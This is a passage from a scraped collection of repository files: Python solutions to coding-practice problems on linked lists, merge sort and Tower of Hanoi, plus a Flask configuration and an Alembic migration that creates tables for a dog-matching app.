"text": "\"\"\"\r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\"\"\" EDitorial fastest \"\"\"\"\r\n Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : head node of linked list\r\n # @return the head node in the linked list\r\n def addTwoNumbers(self, A, B):\r\n # corner cases\r\n if A == None and B == None:\r\n return None\r\n \r\n p1, p2 = A, B\r\n \r\n # add B to A\r\n carry = 0\r\n while p1.next != None and p2.next != None:\r\n added_num = p1.val + p2.val + carry\r\n p1.val = added_num%10\r\n carry = added_num//10\r\n p1 = p1.next\r\n p2 = p2.next\r\n\r\n added_num = p1.val + p2.val + carry\r\n p1.val = added_num%10\r\n carry = added_num//10\r\n\r\n if p1.next == None and p2.next == None:\r\n if carry == 1:\r\n p1.next = ListNode(1)\r\n else:\r\n if p1.next == None:\r\n p1.next = p2.next\r\n p1 = p1.next\r\n while carry and p1.next != None:\r\n added_num = p1.val + carry\r\n p1.val = added_num%10\r\n carry = added_num//10\r\n p1 = p1.next\r\n if carry == 1:\r\n added_num = p1.val + carry\r\n p1.val = added_num%10\r\n carry = added_num//10\r\n if carry == 1:\r\n p1.next = ListNode(1)\r\n return A\r\n\r\n\r\n\r\n\r\n \"\"\" SELF HACKER RANK SMART INTERVIEWS \"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n # Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : head node of linked list\r\n # @return the head node in the linked list\r\n def Rev(self, head):\r\n h2 = None\r\n while(head != None):\r\n x = ListNode(head.val)\r\n x = head\r\n head = head.next\r\n x.next = h2\r\n h2 = x\r\n return h2\r\n \r\n \r\n def addTwoNumbers(self, h1, h2):\r\n h3 = None\r\n h1 = self.Rev(h1)\r\n h2 = self.Rev(h2)\r\n c = 0\r\n while(h1 != None or h2 != None or c!=0):\r\n su = c\r\n if(h1 != None):\r\n su += h1.val\r\n h1 = h1.next\r\n if(h2 != None):\r\n su += h2.val\r\n h2 = h2.next\r\n x = ListNode(su%10)\r\n x.next = h3\r\n h3 = x\r\n c = su//10\r\n h3 = self.Rev(h3)\r\n \r\n return h3\r\n"
},
{
"alpha_fraction": 0.6261767148971558,
"alphanum_fraction": 0.6413604617118835,
"avg_line_length": 20.86805534362793,
"blob_id": "c6b9340c993fbc9fec61e761ae2cdb0b48a37b45",
"content_id": "4a919eb29b54d4d06fdfa1b61e5bd92ff740e60d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3295,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 144,
"path": "/Reverse a linked list.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nReverse a linked list\r\n\r\n1287.43 more points to get your next star!\r\nRank: 114764|Points: 912.57/2200\r\nProblem Solving\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nEditorial\r\nThis challenge is part of a tutorial track by MyCodeSchool and is accompanied by a video lesson.\r\n\r\nYou’re given the pointer to the head node of a linked list. Change the next pointers of the nodes so that their order is reversed. The head pointer given may be null meaning that the initial list is empty.\r\n\r\nInput Format\r\n\r\nYou have to complete the SinglyLinkedListNode reverse(SinglyLinkedListNode head) method which takes one argument - the head of the linked list. You should NOT read any input from stdin/console.\r\n\r\nThe input is handled by the code in the editor and the format is as follows:\r\n\r\nThe first line contains an integer , denoting the number of test cases.\r\nEach test case is of the following format:\r\n\r\nThe first line contains an integer , denoting the number of elements in the linked list.\r\nThe next lines contain an integer each, denoting the elements of the linked list.\r\n\r\nConstraints\r\n\r\n, where is the element in the list.\r\nOutput Format\r\n\r\nChange the next pointers of the nodes that their order is reversed and return the head of the reversed linked list. Do NOT print anything to stdout/console.\r\n\r\nThe output is handled by the code in the editor. The output format is as follows:\r\n\r\nFor each test case, print in a new line the elements of the linked list after reversing it, separated by spaces.\r\n\r\nSample Input\r\n\r\n1\r\n5\r\n1\r\n2\r\n3\r\n4\r\n5\r\nSample Output\r\n\r\n5 4 3 2 1 \r\nExplanation\r\n\r\nThe initial linked list is: 1 -> 2 -> 3 -> 4 -> 5 -> NULL\r\n\r\nThe reversed linked list is: 5 -> 4 -> 3 -> 2 -> 1 -> NULL\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\nclass SinglyLinkedListNode:\r\n def __init__(self, node_data):\r\n self.data = node_data\r\n self.next = None\r\n\r\nclass SinglyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert_node(self, node_data):\r\n node = SinglyLinkedListNode(node_data)\r\n\r\n if not self.head:\r\n self.head = node\r\n else:\r\n self.tail.next = node\r\n\r\n\r\n self.tail = node\r\n\r\ndef print_singly_linked_list(node, sep, fptr):\r\n while node:\r\n fptr.write(str(node.data))\r\n\r\n node = node.next\r\n\r\n if node:\r\n fptr.write(sep)\r\n\r\n# Complete the reverse function below.\r\n\r\n#\r\n# For your reference:\r\n#\r\n# SinglyLinkedListNode:\r\n# int data\r\n# SinglyLinkedListNode next\r\n#\r\n#\r\ndef reverse(head):\r\n h2 = None\r\n while(head != None):\r\n x = SinglyLinkedListNode(head.data)\r\n x = head\r\n head = head.next\r\n x.next = h2\r\n h2 = x\r\n return h2\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n tests = int(input())\r\n\r\n for tests_itr in range(tests):\r\n llist_count = int(input())\r\n\r\n llist = SinglyLinkedList()\r\n\r\n for _ in range(llist_count):\r\n llist_item = int(input())\r\n llist.insert_node(llist_item)\r\n\r\n llist1 = reverse(llist.head)\r\n\r\n print_singly_linked_list(llist1, ' ', fptr)\r\n fptr.write('\\n')\r\n\r\n fptr.close()\r\n"
},
{
"alpha_fraction": 0.6503428220748901,
"alphanum_fraction": 0.6640548706054688,
"avg_line_length": 22.503999710083008,
"blob_id": "701534d196d026d8ed9fa05967f6dd51e190504b",
"content_id": "7d9d9f3c0decacad20b2f2f1a9daca397ec3f6d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3063,
"license_type": "no_license",
"max_line_length": 279,
"num_lines": 125,
"path": "/Delete duplicate-value nodes from a sorted linked list.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nDelete duplicate-value nodes from a sorted linked list\r\n1262.43 more points to get your next star!\r\nRank: 110100|Points: 937.57/2200\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nThis challenge is part of a tutorial track by MyCodeSchool\r\n\r\nYou're given the pointer to the head node of a sorted linked list, where the data in the nodes is in ascending order. Delete as few nodes as possible so that the list does not contain any value more than once. The given head pointer may be null indicating that the list is empty.\r\n\r\nInput Format\r\n\r\nYou have to complete the SinglyLinkedListNode* removeDuplicates(SinglyLinkedListNode* head) method which takes one argument - the head of the sorted linked list. You should NOT read any input from stdin/console.\r\n\r\nThe input is handled by the code in the editor and the format is as follows:\r\n\r\nThe first line contains an integer\r\n\r\n, denoting the number of test cases. The format for each test case is as follows:\r\n\r\nThe first line contains an integer\r\n, denoting the number of elements in the linked list.\r\nThe next\r\n\r\nlines contain an integer each, denoting the elements of the linked list.\r\n\r\nConstraints\r\n\r\nOutput Format\r\n\r\nDelete as few nodes as possible to ensure that no two nodes have the same data. Adjust the next pointers to ensure that the remaining nodes form a single sorted linked list. Then return the head of the sorted updated linked list. Do NOT print anything to stdout/console.\r\n\r\nThe output is handled by the code in the editor and the format is as follows: For each test case, print in a new line, the data of the linked list after removing the duplicates separated by space.\r\n\r\nSample Input\r\n\r\n1\r\n5\r\n1\r\n2\r\n2\r\n3\r\n4\r\n\r\nSample Output\r\n\r\n1 2 3 4 \r\n\r\nExplanation\r\n\r\nThe initial linked list is: 1 -> 2 -> 2 -> 3 -> 4 -> NULL\r\n\r\nThe final linked list is: 1 -> 2 -> 3 -> 4 -> NULL\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\nclass SinglyLinkedListNode:\r\n def __init__(self, node_data):\r\n self.data = node_data\r\n self.next = None\r\n\r\nclass SinglyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert_node(self, node_data):\r\n node = SinglyLinkedListNode(node_data)\r\n\r\n if not self.head:\r\n self.head = node\r\n else:\r\n self.tail.next = node\r\n\r\n\r\n self.tail = node\r\n\r\ndef print_singly_linked_list(node, sep, fptr):\r\n while node:\r\n fptr.write(str(node.data))\r\n\r\n node = node.next\r\n\r\n if node:\r\n fptr.write(sep)\r\n\r\n# Complete the removeDuplicates function below.\r\n\r\n#\r\n# For your reference:\r\n#\r\n# SinglyLinkedListNode:\r\n# int data\r\n# SinglyLinkedListNode next\r\n#\r\n#\r\ndef removeDuplicates(head):\r\n if(head == None):\r\n return head\r\n t = head\r\n while(t.next != None):\r\n if(t.data == t.next.data):\r\n t.next = t.next.next\r\n else:\r\n t = t.next\r\n return head\r\n\r\nif __name__ == '__main__':\r\n"
},
{
"alpha_fraction": 0.547863245010376,
"alphanum_fraction": 0.5564102530479431,
"avg_line_length": 22.212766647338867,
"blob_id": "bbdf6d8bece8ebaeb982274952f94651b6b5de6e",
"content_id": "ff918de22ede72411d0ebb1ae3d78484eddb5556",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 47,
"path": "/Palindrome List Linked List.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nPalindrome List\r\n\r\n Asked in: \r\n Amazon\r\n Microsoft\r\n\r\nGiven a singly linked list, determine if its a palindrome. Return 1 or 0 denoting if its a palindrome or not, respectively.\r\n\r\nNotes:\r\n\r\n Expected solution is linear in time and constant in space.\r\n\r\nFor example,\r\n\r\nList 1-->2-->1 is a palindrome.\r\nList 1-->2-->3 is not a palindrome.\r\n\r\n NOTE: You only need to implement the given function. Do not read input, instead use the arguments to the function. Do not print the output, instead return values as specified.\r\n Still have a doubt? Checkout Sample Codes for more details. \r\n\r\n\"\"\"\r\n\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @return an integer\r\n def lPalin(self, A):\r\n st = []\r\n temp = A\r\n while(A != None):\r\n st.append(A.val)\r\n A = A.next\r\n A = temp\r\n while(A != None):\r\n if(st.pop() != A.val):\r\n return 0\r\n A = A.next\r\n return 1\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.5305343270301819,
"alphanum_fraction": 0.5338740348815918,
"avg_line_length": 22.36046600341797,
"blob_id": "1a9928c70b2dd9076aacf217fb1726d11b62551e",
"content_id": "09cacf0b2a6e53cc4d2f46768d5bb26360cbd101",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2096,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 86,
"path": "/Insertion Sort List LINKED LISTS.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nInsertion Sort List\r\n\r\n Asked in: \r\n Microsoft\r\n Google\r\n\r\nSort a linked list using insertion sort.\r\n\r\nWe have explained Insertion Sort at Slide 7 of Arrays\r\n\r\nInsertion Sort Wiki has some details on Insertion Sort as well.\r\n\r\nExample :\r\n\r\nInput : 1 -> 3 -> 2\r\n\r\nReturn 1 -> 2 -> 3\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @return the head node in the linked list\r\n \r\n def insertionSortList(self, head_ref): \r\n \r\n # Initialize sorted linked list \r\n sorted = None\r\n \r\n # Traverse the given linked list and insert every \r\n # node to sorted \r\n current = head_ref \r\n while (current != None): \r\n \r\n # Store next for next iteration \r\n next = current.next\r\n \r\n # insert current in sorted linked list \r\n sorted = self.sortedInsert( sorted, current) \r\n \r\n # Update current \r\n current = next\r\n \r\n # Update head_ref to point to sorted linked list \r\n head_ref = sorted\r\n return head_ref \r\n \r\n# function to insert a new_node in a list. Note that this \r\n# function expects a pointer to head_ref as this can modify the \r\n# head of the input linked list (similar to push()) \r\n def sortedInsert(self, head_ref, new_node): \r\n \r\n current = None\r\n \r\n # Special case for the head end */ \r\n if (head_ref == None or (head_ref).val >= new_node.val): \r\n \r\n new_node.next = head_ref \r\n head_ref = new_node \r\n \r\n else: \r\n \r\n # Locate the node before the point of insertion \r\n current = head_ref \r\n while (current.next != None and\r\n current.next.val < new_node.val): \r\n \r\n current = current.next\r\n \r\n new_node.next = current.next\r\n current.next = new_node \r\n \r\n return head_ref \r\n"
},
{
"alpha_fraction": 0.4434550404548645,
"alphanum_fraction": 0.4964381158351898,
"avg_line_length": 17.701753616333008,
"blob_id": "b9a4347994e32382dae47ed0e003be1fed21ad1b",
"content_id": "2beb30c13aaf111d907e0ceb3a6dad2faaf84a05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2246,
"license_type": "no_license",
"max_line_length": 275,
"num_lines": 114,
"path": "/find frequency.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nFinding the Floor\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array, you have to find the floor of a number x. The floor of a number x is nothing but the largest number in the array less than or equal to x.\r\n\r\nInput Format\r\n\r\nFirst line of input contains N - size of the array. The next line contains N integers, the elements of the array. The next line contains Q - number of queries. Each of the next Q lines contains a single integer X, for which you have to find the floor of X in the given array.\r\n\r\nConstraints\r\n\r\n30 points\r\n1 <= N <= 105\r\n1 <= Q <= 102\r\n-108 <= ar[i] <= 108\r\n\r\n70 points\r\n1 <= N <= 105\r\n1 <= Q <= 105\r\n-108 <= ar[i] <= 108\r\n\r\nOutput Format\r\n\r\nFor each query, print the floor of X, separated by newline. If floor not found, print the value of \"INT_MIN\"\r\n\r\nSample Input 0\r\n\r\n6\r\n-6 10 -1 20 15 5 \r\n5\r\n-1\r\n10\r\n8\r\n-10\r\n-4\r\n\r\nSample Output 0\r\n\r\n-1\r\n10\r\n5\r\n-2147483648\r\n-6\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\ndef findfloor(ar, l, h, c,ans):\r\n m = (l+h)//2\r\n while(l<=h):\r\n if(ar[m]==c):\r\n ans = ar[m]\r\n return ans \r\n if(ar[m]>c):\r\n return findfloor(ar, l, m-1, c, ans )\r\n if(ar[m]<c):\r\n ans = ar[m]\r\n return findfloor(ar, m+1, h, c, ans )\r\n return ans \r\n return ans \r\n \r\ndef merges(ar,l,h):\r\n if(l==h):\r\n return\r\n mid=(l+h)//2\r\n merges(ar,l,mid)\r\n merges(ar,mid+1,h)\r\n merge(ar,l,mid,h)\r\n \r\ndef merge(ar,l,mid,h):\r\n p1 = l\r\n p2 = mid+1\r\n k = 0\r\n size = h-l+1\r\n temp = [0]*size\r\n while((p1<=mid) and (p2<=h)):\r\n if(ar[p1]>ar[p2]):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n else:\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p1<=mid):\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p2<=h):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n for i in range(l,h+1):\r\n ar[i] = temp[i-l] \r\n\r\n\r\nn = int(input())\r\nar = list(map(int, input().split()))\r\nmerges(ar, 0, n-1)\r\nquer = int(input())\r\nans = -2147483648\r\nfor q in range(quer):\r\n c = int(input())\r\n val = findfloor(ar, 0, n-1, c,ans)\r\n print(val)\r\n"
},
{
"alpha_fraction": 0.4676056206226349,
"alphanum_fraction": 0.4816901385784149,
"avg_line_length": 21.933332443237305,
"blob_id": "9cb0e4a3d801aa52846f075a86a889fea1716bd8",
"content_id": "036276000ccdf63fb4d26510a567d3502280a9d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 355,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 15,
"path": "/recursion/toh_easy.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": " def toh(n,src, dest, temp):\n if(n==0):\n return\n toh(n-1, src, temp, dest )\n print(\"Move {} from {} to {}\".format(n, src, dest))\n toh(n-1, temp, dest, src)\n\n\nfor _ in range(int(input())):\n n = int(input())\n src = \"A\"\n dest = \"C\"\n temp = \"B\"\n print(2**n-1) # no.of shifts required \n toh(n,src, dest, temp)\n \n \n"
}
] | 39 |
edwin-19/Backbone-Scratch | https://github.com/edwin-19/Backbone-Scratch | aef8cbc362eefd2ae253a8dcfc70aa917419efb1 | 7a7eb0c186b2f20aa2c46b685527af60a1d05151 | bcfd51ed4eed600252964f48c05d0249d1ffba93 | refs/heads/master | 2023-03-08T09:59:39.886941 | 2021-02-25T16:03:11 | 2021-02-25T16:03:11 | 340,708,286 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7197452187538147,
"alphanum_fraction": 0.7770700454711914,
"avg_line_length": 38.5,
"blob_id": "a147bc45345b8f0f24cb9022949b9f4b861ad2c8",
"content_id": "254ffada9c63170d26abddb3d3fd31b4fc8594bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 4,
"path": "/backbone/resnet.py",
"repo_name": "edwin-19/Backbone-Scratch",
"src_encoding": "UTF-8",
"text": "from backbone.blocks.resnet_block import conv_first_block, convolutional_block, identity_block\n\ndef ResNet50(input_shape=(224, 224, 3), activation):\n pass"
},
{
"alpha_fraction": 0.5453445911407471,
"alphanum_fraction": 0.5719467997550964,
"avg_line_length": 29.629629135131836,
"blob_id": "26278376df035c5fd72f0e27dc8f4cd8d668735c",
"content_id": "563f0be03c5ddbdffc3d4b3711ab503793d5a1ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 827,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 27,
"path": "/README.md",
"repo_name": "edwin-19/Backbone-Scratch",
"src_encoding": "UTF-8",
"text": "# Deep Learning Networks from scratch\nThe idea here is to understand and write each backbone network from scratch and replace them with more state of the art activation functions such as swish or mish.\n\n## Todo\nResnet:\n\n- [x] Resnet50\n- [x] Resnet101\n- [x] Resnet152\n\nMobile Net:\n\n- [ ] MobileNetV1\n- [ ] MobileNetV2\n\nUtitlities:\n- [ ] General purpose function for selecting activation functions\n- [ ] Create general purpose module for backbone\n- [ ] Pyfile for training, evaluation and demo\n\n\n## Comparison of Activation Functions\n| Activation Function | Matthews Correlation Coefficient |\n|---------------------|----------------------------------|\n| Relu | 96.09 |\n| Swish | 98.04 |\n| Mish | 98.24 | "
},
{
"alpha_fraction": 0.6091410517692566,
"alphanum_fraction": 0.6371158361434937,
"avg_line_length": 35.20000076293945,
"blob_id": "a39bd5c7178ddcb61c210ee6a2cb1cb816c2b541",
"content_id": "1e216ff7acbb23f7f0c96be6ee95d201ad348fc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2538,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 70,
"path": "/backbone/blocks/resnet_block.py",
"repo_name": "edwin-19/Backbone-Scratch",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n\ndef identity_block(x, filters, kernel_size):\n f1, f2, f3 = filters\n \n x_shortcut = x\n \n # First block of identity\n x = tf.keras.layers.Conv2D(f1, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n \n # Second block of identity\n x = tf.keras.layers.Conv2D(f2, kernel_size=kernel_size, strides=(1, 1), padding='same')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n \n # Third block of identity \n x = tf.keras.layers.Conv2D(f3, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n \n # Skip Conncection\n x = tf.keras.layers.Add()([x, x_shortcut])\n \n # Activaton to fireoff the next layer\n x = tf.keras.layers.Activation('relu')(x)\n \n return x\n\ndef convolutional_block(x, filters, kernel_size, strides):\n f1, f2, f3 = filters\n \n x_shortcut = x\n \n # First block of convolutional block\n x = tf.keras.layers.Conv2D(f1, kernel_size=(1, 1), strides=strides)(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n \n # Second block of convolutional block\n x = tf.keras.layers.Conv2D(f2, kernel_size=kernel_size, strides=(1, 1), padding='same')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n \n # Third block of convolutional block\n x = tf.keras.layers.Conv2D(f3, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n \n # Shortcut path\n x_shortcut = tf.keras.layers.Conv2D(f3, kernel_size=(1, 1), strides=strides, padding='valid')(x_shortcut)\n x_shortcut = tf.keras.layers.BatchNormalization(axis=3)(x_shortcut)\n \n # Skip connection\n x = tf.keras.layers.Add()([x, x_shortcut])\n \n # Fire off to the last layer\n x = tf.keras.layers.Activation('relu')(x)\n return x\n\ndef conv_first_block(input_shape=(224, 224, 3)):\n input_layer = tf.keras.layers.Input(input_shape)\n x = tf.keras.layers.ZeroPadding2D((3, 3))(input_layer)\n \n # Stage 1\n x = tf.keras.layers.Conv2D(64, kernel_size=(7, 7), strides=(2, 2))(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n x = tf.keras.layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n \n return x, input_layer\n "
}
] | 3 |
gabriel-andrian/pets-love | https://github.com/gabriel-andrian/pets-love | 4407c1df5809429355f5989c1a5a1e5f7b786c7f | 8261a75a508e0e7a92a7a390e329931f05289f07 | 97dfee8933ed1a2d7e1bcb850a775567a789cd36 | refs/heads/main | 2023-02-27T08:40:22.799450 | 2021-01-22T02:47:15 | 2021-01-22T02:47:15 | 335,694,022 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6722054481506348,
"alphanum_fraction": 0.7024168968200684,
"avg_line_length": 24.461538314819336,
"blob_id": "ee5a6598f03aef6c64e4494a66722c1370dfc4b4",
"content_id": "76fe2bde4fca57bc456ace92a293effdce8bdc6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 662,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 26,
"path": "/config.py",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "from environs import Env\n# from secrets import token_hex\n\nenv = Env()\nenv.read_env()\n\n\nclass Config:\n DEBUG = False\n TESTING = False\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n # JWT_SECRET_KEY = token_hex(16)\n # JWT_ACCESS_TOKEN_EXPIRES = False\n\n\nclass DevelopmentConfig(Config):\n DATABASE_URL = 'postgresql://postgres:12345678@localhost/capstone_q3'\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = 'postgresql://postgres:12345678@localhost/capstone_q3'\n\n\nclass ProductionConfig(Config):\n ENV = 'production'\n DATABASE_URL = env.str('DATABASE_URL')\n BREEDS_CSV = env.str('BREEDS_CSV')\n SQLALCHEMY_DATABASE_URI = env.str('DATABASE_URL')\n"
},
{
"alpha_fraction": 0.6393442749977112,
"alphanum_fraction": 0.6523224115371704,
"avg_line_length": 38.56756591796875,
"blob_id": "78e801339c7eb12f23f0994b7ffb517d432d2af9",
"content_id": "cfbdfa5bbce122441151580672a69b29744b0493",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4392,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 111,
"path": "/migrations/versions/3a1f06bc9c90_create_all_tables.py",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "\"\"\"create all tables\n\nRevision ID: 3a1f06bc9c90\nRevises: 5aa5bb13c991\nCreate Date: 2021-01-21 22:19:23.387898\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3a1f06bc9c90'\ndown_revision = '5aa5bb13c991'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('breed',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('conversation',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('time_started', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('owner',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('surname', sa.String(length=64), nullable=True),\n sa.Column('document', sa.String(length=20), nullable=False),\n sa.Column('email', sa.String(length=128), nullable=False),\n sa.Column('address', sa.String(length=128), nullable=False),\n sa.Column('password', sa.String(length=128), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('document'),\n sa.UniqueConstraint('email')\n )\n op.create_table('dog',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('details', sa.String(length=300), nullable=True),\n sa.Column('owner_id', sa.Integer(), nullable=True),\n sa.Column('breed_id', sa.Integer(), nullable=True),\n sa.Column('gender', sa.Boolean(), nullable=False),\n sa.ForeignKeyConstraint(['breed_id'], ['breed.id'], ),\n sa.ForeignKeyConstraint(['owner_id'], ['owner.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('dog_conversation',\n sa.Column('dog_id', sa.Integer(), nullable=True),\n sa.Column('conversation_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['conversation_id'], ['conversation.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['dog_id'], ['dog.id'], ondelete='CASCADE')\n )\n op.create_table('interest',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('dog_id', sa.Integer(), nullable=False),\n sa.Column('breed_id', sa.Integer(), nullable=False),\n sa.Column('gender_interest', sa.Boolean(), nullable=False),\n sa.ForeignKeyConstraint(['breed_id'], ['breed.id'], ),\n sa.ForeignKeyConstraint(['dog_id'], ['dog.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('dog_id')\n )\n op.create_table('like',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('dog_id_give', sa.Integer(), nullable=False),\n sa.Column('dog_id_receive', sa.Integer(), nullable=False),\n sa.Column('dislike', sa.Boolean(), nullable=False),\n sa.Column('match', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['dog_id_give'], ['dog.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['dog_id_receive'], ['dog.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('message',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('message', sa.Text(), nullable=False),\n sa.Column('ts', sa.DateTime(), nullable=True),\n sa.Column('dog_id', sa.Integer(), nullable=False),\n sa.Column('conversation_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['conversation_id'], ['conversation.id'], ),\n sa.ForeignKeyConstraint(['dog_id'], ['dog.id'], ondelete='CASCADE'),\n 
sa.PrimaryKeyConstraint('id')\n )\n op.create_table('photo',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('dog_account_id', sa.Integer(), nullable=True),\n sa.Column('link', sa.String(), nullable=False),\n sa.ForeignKeyConstraint(['dog_account_id'], ['dog.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('photo')\n op.drop_table('message')\n op.drop_table('like')\n op.drop_table('interest')\n op.drop_table('dog_conversation')\n op.drop_table('dog')\n op.drop_table('owner')\n op.drop_table('conversation')\n op.drop_table('breed')\n # ### end Alembic commands ###\n"
},
{
"alpha_fraction": 0.7766990065574646,
"alphanum_fraction": 0.791262149810791,
"avg_line_length": 22,
"blob_id": "9bc98565cda51ff6fe80b47c92a75abecb26589a",
"content_id": "c9f9141b3ee18ffa9bdab30ba3f05028fc85c4c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 206,
